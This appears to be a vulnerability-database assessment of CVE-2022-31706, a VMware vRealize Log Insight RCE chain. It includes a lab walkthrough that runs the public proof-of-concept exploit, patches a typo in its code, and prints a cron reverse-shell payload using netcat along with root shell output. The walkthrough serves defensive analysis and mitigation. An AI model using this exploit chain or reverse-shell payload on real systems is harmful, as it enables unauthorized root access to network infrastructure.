Very High
CVE-2022-31706
CVE-2022-31706
Description
The vRealize Log Insight contains a Directory Traversal Vulnerability. An unauthenticated, malicious actor can inject files into the operating system of an impacted appliance which can result in remote code execution.
Add Assessment
Technical Analysis
On 31 January 2023, security researcher James Horman and team from Horizon3.ai published a Technical Deep Dive on vulnerabilities that exist in VMware vRealize Log Insight and how to exploit those to get unauthenticated remote access to the application. Please read the blog VMware vRealize Log Insight VMSA-2023-0001 Technical Deep Dive for all the technical details.
What makes this use case particular interested is the chaining of multiple vulnerabilities to achieve the unauthenticated RCE.
Basically there are four vulnerabilities that are published in the VMware VMSA-2023-0001 security disclosure:
CVE-2022-31706: VMware vRealize Log Insight Directory Traversal Vulnerability
CVE-2022-31704: VMware vRealize Log Insight broken Access Control Vulnerability
CVE-2022-31710: VMware vRealize Log Insight Deserialization Vulnerability
CVE-2022-31711: VMware vRealize Log Insight Information Disclosure Vulnerability
The analysis shows that three vulnerabilities CVE-2022-31706, CVE-2022-31704 and CVE-2022-31711 are chained to achieve the RCE.
In a nutshell:
CVE-2022-31704is used to gain unauthorized access to theApache Thriftserver to execute commands.Apache Thriftis a RPC framework that allows client/server communication and is typically used to establish communication between components of the system.
- The
Apache Thriftserver in the VMware vRealize Log Insight application is vulnerable and can be accessed with a client to execute specific commands defined in the framework.
- In this scenario, two RPC commands are being exploited,
remotePakDownloadCommandandpakUpgradeCommandthat allows for an unauthenticated upload of a malicious PAK file with an attached payload that can be extracted to any place on the filesystem usingCVE-2022-31706that allows for Directory Traversal.
- Last but not least, the
remotePakDownloadCommandrequires a node token to work. A node token is aguidthat is unique per instance of Log Insight. This information is not readily available to an unauthenticated user. However, there are variousThriftRPC commands that leak the node token includinggetConfigandgetHealthStatus, which links back to the thirdCVE-2022-31711– VMware vRealize Log Insight Information Disclosure Vulnerability.
Now let’s see in real-life practice, how this vulnerability works…
First we need install a vulnerable instance of VMware vRealize Log Insight, which you can download from this link.
You need to be registered as a customer or you can apply for a trial license before you can download the OVA.
Import the OVA in your favorite hypervisor application. I am using Oracle VirtualBox.
Please allocate enough memory and CPU (minimal 4 GB and 2 vCPU) otherwise your appliance will be dead slow and the exploit will fail due to lack of space in the /tmp directory.
Go thru the setup of the appliance. This is all very straight forward.
If you have the appliance running, go to the POC at Github that has been created by the Horizon3.ai team.
Clone the repository.
Before you start executing the exploit, please install Thrift python support.
# pip3 install thrift
and install the thrift-compiler.
Not needed for the exploit to work but it gives you the ability to generate thrift modules for other languages such as ruby.
# apt install thrift-compiler
The last thing that you need to do is to correct a small typo that the guys from Horizon3.ai made in their code.
Yeah, everybody makes mistakes, even these guys ;–)
Open VMSA-2023-0001.py with your favorite editor and go to the section below.
def remote_pak_download(client, node_token, http_server_address, http_server_port): command = Command() command.commandType = 9 download_command = RemotePakDownloadCommand() download_command.sourceNodeToken = node_token # The remote system does not return an error if this url is incorrect. # It just silently fails download_command.requestUrl = f"http://{http_server_address}:{http_server_port}/exploit.tar" download_command.fileName = "exploit.pak" command.remotePakDownloadCommand = download_command
Change download_command.fileName = "exploit" to download_command.fileName = "exploit.pak" and save the file.
Now we are ready to run the exploit against our installed target.
- The exploit will gain access by obtaining the token.
- Next, it will create a malicious PAK file with the payload attached that is a crontab file with a
netcatcommand connecting back to your system.
- PAK file gets upload and extracted using the vulnerable
Apache Thriftserver running on the Log Insight server.
- Run a
netcatlistener on your system to catch thenetcatconnection from the target system triggered by thecrondaemon after successful exploitation.
# python3 ./VMSA-2023-0001.py --target_address 192.168.100.92 --http_server_address 192.168.100.7 --http_server_port 1981 --payload_file payload --payload_path /etc/cron.d/exploit [+] Using CVE-2022-31711 to leak node token [+] Found node token: 8984be67-2394-4da1-bf87-2635d558329d [+] Using CVE-2022-31704 to trigger malicious file download 192.168.100.92 - - [03/Feb/2023 17:19:02] "GET /exploit.tar HTTP/1.1" 200 - [+] File successfully downloaded [+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell [+] Payload successfully delivered # nc -lnvp 8888 listening on [any] 8888 ... connect to [192.168.100.7] from (UNKNOWN) [192.168.100.92] 42746 uname -a Linux localhost 4.19.245-1.ph3 #1-photon SMP Thu Jun 2 02:30:39 UTC 2022 x86_64 GNU/Linux whoami root cat /etc/issue VMware vRealize Log Insight cat /etc/photon-release VMware Photon OS 3.0 PHOTON_BUILD_NUMBER=05f9d3d8d
If you login into the appliance, you can find the exploit.pak in the /tmp directory and the a cron file exploit created in the /etc/cron.d directory.
If you check the contents of the PAK file, you will see the ../../etc/crond.d/exploit file with the directory traversal.
root@localhost [ ~ ]# ls -l /tmp/*.pak -rw-r--r-- 1 root root 122880 Feb 3 17:18 /tmp/exploit.pak root@localhost [ ~ ]# ls -l /etc/cron.d/exploit -rw-r--r-- 1 root root 51 Feb 3 12:24 /etc/cron.d/exploit root@localhost [ ~ ]# cat /etc/cron.d/exploit * * * * * root nc -e /bin/bash 192.168.100.7 8888 root@localhost [ ~ ]# tar -tvf/tmp/exploit.pak -rw-r--r-- root/root 35768 2023-02-03 09:10 upgrade-image-8.10.2-21145187.rpm -rw-r--r-- root/root 35768 2023-02-03 09:10 upgrade-driver -rw-r--r-- root/root 35768 2023-02-03 09:10 eula.txt -rw-r--r-- root/root 1926 2023-02-03 09:10 VMware-vRealize-Log-Insight.cert -rw-r--r-- root/root 1790 2023-02-03 09:10 VMware-vRealize-Log-Insight.mf tar: Removing leading `../../' from member names -rw-r--r-- root/root 51 2023-02-03 12:24 ../../etc/cron.d/exploit
The example above show that the exploit is pretty simple to weaponize and execute, however there is a low probability of exploitation in the wild.
The main reason is that VMware vRealize Log Insight is typically not exposed to the public Internet and the Thrift RPC ports 16520 through 16580 should be accessible for the exploit to work.
But from the inside, it is of course a very attractive target to exploit because it has tons of nice information on the network and servers ready to be disclosed to an attacker.
Mitigation
Please update VMware vRealize Log Insight to 8.10.2.
References
Horizon3.ai: VMware vRealize Log Insight VMSA-2023-0001 Technical Deep Dive
VMware advisory
Horizon3.ai: POC
Credits
Credits goes to the security researchers below that analyzed the vulnerabilities and discovered the RCE chain.
CVSS V3 Severity and Metrics
General Information
Vendors
- vmware
Products
- vrealize log insight
Metasploit Modules
References
Exploit
Additional sources will be added here as they become relevant.
Notes: We will only add the top 3 POCs for a given CVE. POCs added here must have at least 2 GitHub stars.
